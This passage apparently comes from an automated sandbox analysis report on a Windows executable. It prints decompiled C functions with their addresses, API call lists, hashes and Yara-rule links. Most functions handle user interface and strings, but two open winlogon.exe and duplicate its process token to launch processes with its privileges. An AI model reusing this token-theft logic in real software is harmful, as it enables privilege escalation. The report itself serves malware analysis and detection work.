				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                0x004041f9
                                                                                                                0x00404205
                                                                                                                0x00404208
                                                                                                                0x00404217
                                                                                                                0x0040421e
                                                                                                                0x00404236
                                                                                                                0x0040423f
                                                                                                                0x0040424a
                                                                                                                0x0040425f
                                                                                                                0x0040426b
                                                                                                                0x0040426e
                                                                                                                0x0040426e
                                                                                                                0x00404275
                                                                                                                0x004043be
                                                                                                                0x004043ce
                                                                                                                0x004043d0
                                                                                                                0x004043d3
                                                                                                                0x004043da
                                                                                                                0x004043da
                                                                                                                0x004043c0
                                                                                                                0x004043c3
                                                                                                                0x004043c3
                                                                                                                0x0040427b
                                                                                                                0x0040428c
                                                                                                                0x0040428f
                                                                                                                0x00404295
                                                                                                                0x004042a5
                                                                                                                0x004042b8
                                                                                                                0x004042cb
                                                                                                                0x004042de
                                                                                                                0x004042f1
                                                                                                                0x00404304
                                                                                                                0x00404317
                                                                                                                0x0040432a
                                                                                                                0x0040433d
                                                                                                                0x00404350
                                                                                                                0x00404363
                                                                                                                0x00404376
                                                                                                                0x00404389
                                                                                                                0x0040439c
                                                                                                                0x004043a4
                                                                                                                0x004043af
                                                                                                                0x004043b5
                                                                                                                0x004043b5
                                                                                                                0x004043f5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                0x00405b81
                                                                                                                0x00405b88
                                                                                                                0x00405b8a
                                                                                                                0x00405b8a
                                                                                                                0x00405b8f
                                                                                                                0x00405b96
                                                                                                                0x00405b9b
                                                                                                                0x00405bad
                                                                                                                0x00405bad
                                                                                                                0x00405b9d
                                                                                                                0x00405b9d
                                                                                                                0x00405ba8
                                                                                                                0x00405bab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405bab
                                                                                                                0x00405be9
                                                                                                                0x00405be9
                                                                                                                0x00405baf
                                                                                                                0x00405bb1
                                                                                                                0x00405ce2
                                                                                                                0x00405ce2
                                                                                                                0x00405bb7
                                                                                                                0x00405bbd
                                                                                                                0x00405bf6
                                                                                                                0x00405c4b
                                                                                                                0x00405c4c
                                                                                                                0x00405c52
                                                                                                                0x00405c53
                                                                                                                0x00000000
                                                                                                                0x00405bf8
                                                                                                                0x00405c02
                                                                                                                0x00405c0e
                                                                                                                0x00405c13
                                                                                                                0x00405c18
                                                                                                                0x00405c2c
                                                                                                                0x00405c2e
                                                                                                                0x00405c3b
                                                                                                                0x00405c3c
                                                                                                                0x00405c42
                                                                                                                0x00000000
                                                                                                                0x00405c1a
                                                                                                                0x00405c25
                                                                                                                0x00405c2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c2a
                                                                                                                0x00405c18
                                                                                                                0x00405bbf
                                                                                                                0x00405bc0
                                                                                                                0x00405bcd
                                                                                                                0x00405bce
                                                                                                                0x00405bd7
                                                                                                                0x00405c58
                                                                                                                0x00405c5f
                                                                                                                0x00405c61
                                                                                                                0x00405c61
                                                                                                                0x00405c63
                                                                                                                0x00405cdb
                                                                                                                0x00405cdb
                                                                                                                0x00405c65
                                                                                                                0x00405c65
                                                                                                                0x00405c74
                                                                                                                0x00000000
                                                                                                                0x00405c84
                                                                                                                0x00405c8a
                                                                                                                0x00405c8d
                                                                                                                0x00405c99
                                                                                                                0x00405caf
                                                                                                                0x00405cbd
                                                                                                                0x00405cc8
                                                                                                                0x00405cd4
                                                                                                                0x00405cd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cd9
                                                                                                                0x00405c74
                                                                                                                0x00405c63
                                                                                                                0x00405ce6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                0x00401e59
                                                                                                                0x00401e5c
                                                                                                                0x00401e64
                                                                                                                0x00401e67
                                                                                                                0x00401ef9
                                                                                                                0x00401e6d
                                                                                                                0x00401e70
                                                                                                                0x00401e76
                                                                                                                0x00401e79
                                                                                                                0x00401e7e
                                                                                                                0x00401e83
                                                                                                                0x00401e92
                                                                                                                0x00401e85
                                                                                                                0x00401e8e
                                                                                                                0x00401e8e
                                                                                                                0x00401e96
                                                                                                                0x00401ee6
                                                                                                                0x00401e98
                                                                                                                0x00401e9b
                                                                                                                0x00401e9e
                                                                                                                0x00401ea3
                                                                                                                0x00401ea8
                                                                                                                0x00401ebb
                                                                                                                0x00401eaa
                                                                                                                0x00401eb7
                                                                                                                0x00401eb7
                                                                                                                0x00401ebf
                                                                                                                0x00401ed3
                                                                                                                0x00401ec1
                                                                                                                0x00401ec7
                                                                                                                0x00401ec9
                                                                                                                0x00401ec9
                                                                                                                0x00401ed8
                                                                                                                0x00401ed8
                                                                                                                0x00401eeb
                                                                                                                0x00401eeb
                                                                                                                0x00401f01

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                0x00405241
                                                                                                                0x00405250
                                                                                                                0x00405257
                                                                                                                0x0040525f
                                                                                                                0x00405262
                                                                                                                0x00405265
                                                                                                                0x00405268
                                                                                                                0x0040526f
                                                                                                                0x0040526f
                                                                                                                0x00405277
                                                                                                                0x00405277
                                                                                                                0x0040527a
                                                                                                                0x0040527f
                                                                                                                0x00405284
                                                                                                                0x00405285
                                                                                                                0x00405291
                                                                                                                0x00405296
                                                                                                                0x004052a9
                                                                                                                0x004052b3
                                                                                                                0x004052b7
                                                                                                                0x004052bc
                                                                                                                0x004052ca
                                                                                                                0x004052d2
                                                                                                                0x004052d5
                                                                                                                0x004052d8
                                                                                                                0x004052d8
                                                                                                                0x004052db
                                                                                                                0x004052db
                                                                                                                0x004052e1
                                                                                                                0x004052e4
                                                                                                                0x004052e8
                                                                                                                0x004052f2

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                0x00406157
                                                                                                                0x0040616d
                                                                                                                0x00406174
                                                                                                                0x0040617f
                                                                                                                0x00406185
                                                                                                                0x00406196
                                                                                                                0x0040619e
                                                                                                                0x004061b6
                                                                                                                0x004061bd
                                                                                                                0x004061d4
                                                                                                                0x004061da
                                                                                                                0x004061e0
                                                                                                                0x004061e5
                                                                                                                0x004061e6
                                                                                                                0x004061ef
                                                                                                                0x004061f9
                                                                                                                0x004061ff
                                                                                                                0x004061ef
                                                                                                                0x00406206

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                0x00404706
                                                                                                                0x00404714
                                                                                                                0x0040471c
                                                                                                                0x00404721
                                                                                                                0x0040472b
                                                                                                                0x00404733
                                                                                                                0x00404735
                                                                                                                0x00404735
                                                                                                                0x00404733
                                                                                                                0x00404751
                                                                                                                0x00404780
                                                                                                                0x00404753
                                                                                                                0x0040475e
                                                                                                                0x00404766
                                                                                                                0x0040476c
                                                                                                                0x00404770
                                                                                                                0x00404770
                                                                                                                0x0040478a

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                0x0040598b
                                                                                                                0x0040598b
                                                                                                                0x0040599a
                                                                                                                0x004059ae
                                                                                                                0x004059b5
                                                                                                                0x004059c1
                                                                                                                0x004059c6
                                                                                                                0x004059cb
                                                                                                                0x004059ce
                                                                                                                0x00405a7b
